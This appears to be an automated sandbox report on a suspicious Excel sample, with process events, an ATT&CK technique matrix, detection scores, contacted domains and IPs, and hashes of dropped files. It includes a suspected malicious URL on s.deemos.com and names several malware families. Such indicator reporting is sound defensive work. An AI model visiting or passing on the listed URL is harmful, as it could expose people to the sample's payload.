Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: MS100384UTC.xlsStream path 'MBD006207A6/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: MS100384UTC.xlsStream path 'Workbook' entropy: 7.99859087916 (max. 8.0)
Source: 24731000.0.drStream path 'MBD006207A6/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: 24731000.0.drStream path 'Workbook' entropy: 7.98017787321 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 807Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts3
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
MS100384UTC.xls13%VirustotalBrowse
MS100384UTC.xls18%ReversingLabs
MS100384UTC.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
162.159.61.3
truefalse
    high
    s.deemos.com
    14.103.79.10
    truefalse
      unknown
      assets.msn.com
      unknown
      unknownfalse
        high
        cxcs.microsoft.net
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturefalse
            unknown
            https://s.deemos.com/404false
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturePMS100384UTC.xls, 24731000.0.drfalse
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                14.103.79.10
                s.deemos.comChina
                18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1578870
                Start date and time:2024-12-20 16:03:10 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 40s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                Run name:Potential for more IOCs and behavior
                Number of analysed new started processes analysed:22
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:MS100384UTC.xls
                Detection:MAL
                Classification:mal56.winXLS@4/46@4/1
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Changed system and user locale, location and keyboard layout to French - France
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Active ActiveX Object
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 23.194.30.59, 52.109.32.97, 52.109.28.47, 52.113.194.132, 52.109.28.48, 95.100.135.35, 95.100.135.50, 95.100.135.49, 95.100.135.75, 95.100.135.48, 95.100.135.41, 95.100.135.43, 95.100.135.66, 95.100.135.58, 52.182.143.215, 184.30.24.41, 95.100.135.80, 95.100.135.57, 95.100.135.65, 95.100.135.59, 95.100.135.73, 95.100.135.67, 95.100.135.72, 51.116.253.169, 23.195.77.178, 20.12.23.50, 20.190.177.19, 20.103.156.88
                • Excluded domains from analysis (whitelisted): osiprod-uks-bronze-azsc-000.uksouth.cloudapp.azure.com, e1324.dscd.akamaiedge.net, odc.officeapps.live.com, onedscolprdgwc04.germanywestcentral.cloudapp.azure.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, cxcs.microsoft.net.edgekey.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, c.pki.goog, e3230.b.akamaiedge.net, e28578.d.akamaiedge.net, res-1-tls.cdn.office.net, onedscolprdcus22.centralus.cloudapp.azure.com, windows.msn.com, ecs.office.com, e40491.dscg.akamaiedge.net, assets.msn.com.edgekey.net, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, uks-azsc-000.
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadFile calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Report size getting too big, too many NtSetValueKey calls found.
                TimeTypeDescription
                10:05:25API Interceptor911x Sleep call for process: splwow64.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                14.103.79.10SWIFT.xlsGet hashmaliciousUnknownBrowse
                  SWIFT.xlsGet hashmaliciousUnknownBrowse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    chrome.cloudflare-dns.comSWIFT.xlsGet hashmaliciousUnknownBrowse
                    • 162.159.61.3
                    Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                    • 162.159.61.3
                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                    • 172.64.41.3
                    pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                    • 162.159.61.3
                    invoice.docmGet hashmaliciousMetasploitBrowse
                    • 162.159.61.3
                    ep_setup.exeGet hashmaliciousUnknownBrowse
                    • 162.159.61.3
                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                    • 172.64.41.3
                    QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                    • 162.159.61.3
                    CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                    • 172.64.41.3
                    xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                    • 172.64.41.3
                    s.deemos.comSWIFT.xlsGet hashmaliciousUnknownBrowse
                    • 14.103.79.10
                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                    • 14.103.79.10
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WORLDPHONE-INASNumberforInterdomainRoutingINSWIFT.xlsGet hashmaliciousUnknownBrowse
                    • 14.103.79.10
                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                    • 14.103.79.10
                    Owari.arm.elfGet hashmaliciousUnknownBrowse
                    • 14.103.40.223
                    ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                    • 114.69.243.134
                    SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elfGet hashmaliciousMiraiBrowse
                    • 14.103.40.233
                    3b4m3C11Vd.elfGet hashmaliciousMiraiBrowse
                    • 14.103.92.59
                    HTUyCRuDev.elfGet hashmaliciousUnknownBrowse
                    • 114.69.243.149
                    XoQ5jUCXz6.elfGet hashmaliciousMiraiBrowse
                    • 14.103.40.218
                    x86_32.elfGet hashmaliciousMiraiBrowse
                    • 114.69.243.142
                    No context
                    No context
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):118
                    Entropy (8bit):3.5700810731231707
                    Encrypted:false
                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                    MD5:573220372DA4ED487441611079B623CD
                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1584
                    Entropy (8bit):2.6928361216532144
                    Encrypted:false
                    SSDEEP:24:YxIPuk+z7Fl3HyFOqYp2IyoeyjkFP5VQBMQRgYOCE+E7UXOKI5KazYvKISmtzGd2:YxAT+PFKUFM78BMQiYOSVIADK+GTzq
                    MD5:CE32F70E720ADCBCA3832170077678F5
                    SHA1:DBC905854C8C46BA08DFE3CB040A644C06E76F8D
                    SHA-256:DC3B4A2D32EEB0B387AD67EE71194B61AB60818C633DF870DA89F5485D26FACE
                    SHA-512:48BC3D3AF66EBA0CBA9941D3D8AA1E4360683DE7EDFB8489EACACA9052CF717136EA7CC6B9E58958B454D265C1A011865421BA818D461A15BFD17453DD14C2F0
                    Malicious:false
                    Reputation:low
                    Preview:3.7.4.6.3.7.8.,.3.7.4.6.3.7.6.,.1.0.7.,.6.3.6.4.3.3.4.,.1.1.9.6.3.7.8.,.2.5.5.0.5.0.8.8.,.1.0.1.,.1.0.4.9.5.2.3.4.,.1.1.9.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.2.4.,.1.9.8.4.4.3.5.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.8.,.6.5.4.2.1.8.5.1.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.3.,.1.2.6.,.1.2.2.3.4.3.4.,.4.5.8.4.0.2.3.2.,.2.6.0.1.,.8.7.4.7.0.1.5.3.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.9.,.6.1.7.0.7.3.0.5.,.3.,.3.0.1.5.3.7.2.1.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.5.7.9.9.9.6.6.1.,.4.8.1.9.5.5.3.8.,.7.4.5.3.4.5.9.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.3.,.3.0.1.2.3.4.6.6.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.2.,.1.
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):134544
                    Entropy (8bit):2.9527588414114754
                    Encrypted:false
                    SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
                    MD5:83F48FDD46D3424E92E24E709EAB5960
                    SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
                    SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
                    SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):98872
                    Entropy (8bit):2.314922296391176
                    Encrypted:false
                    SSDEEP:768:XOT4vdx1DW7ohBb66mQK4BTonxqQbApQK6c:+2wc
                    MD5:B16BE7C4304EF9B5B22852D6EF8F1F1A
                    SHA1:2989DB9F02F4762B4188740DDA110F01FB8B9801
                    SHA-256:0EFC26A98A1502D38DCC21398179082E2239EC6069E6CA7D2C273751D22C1363
                    SHA-512:502E5995E4CDF88B2D6605C467BB9B560F679921B20F13147E05FF5831E1082F27AE93DAAF91C84A20B38FD13FC14F8A0F7DF12AC52C67A7B408B1E99202A18B
                    Malicious:false
                    Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):153132
                    Entropy (8bit):2.3475145785826403
                    Encrypted:false
                    SSDEEP:1536:GAOsHV+DAtQaqrUPig97qG7bIQWkaYgJzQp:jdbp
                    MD5:00F44ACEBCC79C40BBC3A6DB23EDBD6E
                    SHA1:69E3D0D6E877268A1AC3C6FBB0DB83F62976EFB5
                    SHA-256:3376D5411FF0B0286D5BAF9323176C24B644BDDA527D9F661CE2C99E453E0877
                    SHA-512:6EB6034B264CC5174004E202365DC618815CA6ABCA8A72C9005E1A3F799E9EDE184DC7884B64B3741E4DD4B2F7B7E3E295434ED6CAD4D8DD1B83FAC82F8C6353
                    Malicious:false
                    Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):13284
                    Entropy (8bit):2.735825271732709
                    Encrypted:false
                    SSDEEP:96:9pyRiCCyynOYeK4jlGWS0BL7g5lqUTM/tIdSUsQ5lV:9rR/W305sUTMpQR
                    MD5:901DCD18F7643CAEBDE4301E05F5C748
                    SHA1:A0ABDDACFFDE3CCF88AA4CBC6F7B252385745BA4
                    SHA-256:BBE8A43E3E499CE8744B1C8680300A8C4EAD33C08EE82CC4D59624C0BB871FB1
                    SHA-512:ADF5729E56F94556E7C979202C75FC1B051B3D9B7B30344C6E9DFE0F5164B3D30554505DC1E9BB8C6319A50436B533EAC7021CC030E040659D02C0616EE3A743
                    Malicious:false
                    Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i......................................................................................../....(....../...................._...(...................N../.............m./L...............L....................../........\........./
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):98872
                    Entropy (8bit):2.315181778019076
                    Encrypted:false
                    SSDEEP:768:XOIjvbx1DW7ohBb66mQK4BTonxqQbApQK6c:+awc
                    MD5:7E328FF1675F4035FD4012FA1A739859
                    SHA1:C3A9AE8FCF918AED84252E8920E9AE1685C9B9A8
                    SHA-256:46EC194B848F5709908BBB3E5DC445510A02FCE5EBEBF2DD3C49E60B99CB478C
                    SHA-512:D4A6D551A8D45FC0307B5A4554991B7F770E3BE2CE69B0008E51D161C4204E0CCEECB55529F16017FC422CA12DA58292A1E2A0B7D69A415E9E983227D2A69618
                    Malicious:false
                    Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):8184
                    Entropy (8bit):2.1428473327791178
                    Encrypted:false
                    SSDEEP:96:EV5g2s88nDfgshP5L9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaouIWZ4V79FdigmR7qii1Bo
                    MD5:4C052D852534E15CBE079EABAE1E82C2
                    SHA1:25679AF476A0AE2435DD5B31D43160EB50E84886
                    SHA-256:10B2B1D465D9216DDD9F1252464D0111DA823EB5482CA34700688064EC7E4786
                    SHA-512:F757A810E45E5E34F34DBCF9FD0067610C705ABCB472289401D6C62B2BD2F7163E46911E52055090461A1142C35801F6BDB16972EE1CC9580D267D41BE232D31
                    Malicious:false
                    Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):153132
                    Entropy (8bit):2.3475145785826403
                    Encrypted:false
                    SSDEEP:1536:GAOsHV+DAtQaqrUPig97qG7bIQWkaYgJzQp:jdbp
                    MD5:00F44ACEBCC79C40BBC3A6DB23EDBD6E
                    SHA1:69E3D0D6E877268A1AC3C6FBB0DB83F62976EFB5
                    SHA-256:3376D5411FF0B0286D5BAF9323176C24B644BDDA527D9F661CE2C99E453E0877
                    SHA-512:6EB6034B264CC5174004E202365DC618815CA6ABCA8A72C9005E1A3F799E9EDE184DC7884B64B3741E4DD4B2F7B7E3E295434ED6CAD4D8DD1B83FAC82F8C6353
                    Malicious:false
                    Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):8184
                    Entropy (8bit):2.139796018041356
                    Encrypted:false
                    SSDEEP:96:EV5g2s88nDfgsRo5v9CWZBqlA2B79sIRdYZgmR7qii1Bo1V:EaofwWZC79FdigmR7qii1Bo
                    MD5:F51FE5344B566DD2D3CC97BB43307EAB
                    SHA1:7B9D3BCEDD619F87F6E71E2E830F62F7B341667B
                    SHA-256:A2F08D981F4917EA44AF6B813109EA7BB6CC4BEBF8FDA1728BC6DD53CCB40015
                    SHA-512:3F894000B0D464B71F7DF8075D8839F48911B19BE5DBDE40565651ED93C2B5BE75886C2C9924B81A8771E73B9BE1104B88F1ECFD540B1A055106F57A3622F34B
                    Malicious:false
                    Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):1293620
                    Entropy (8bit):4.563127917199792
                    Encrypted:false
                    SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                    MD5:F71C973B5E362DFD6408D6C009E5643E
                    SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                    SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                    SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                    Malicious:false
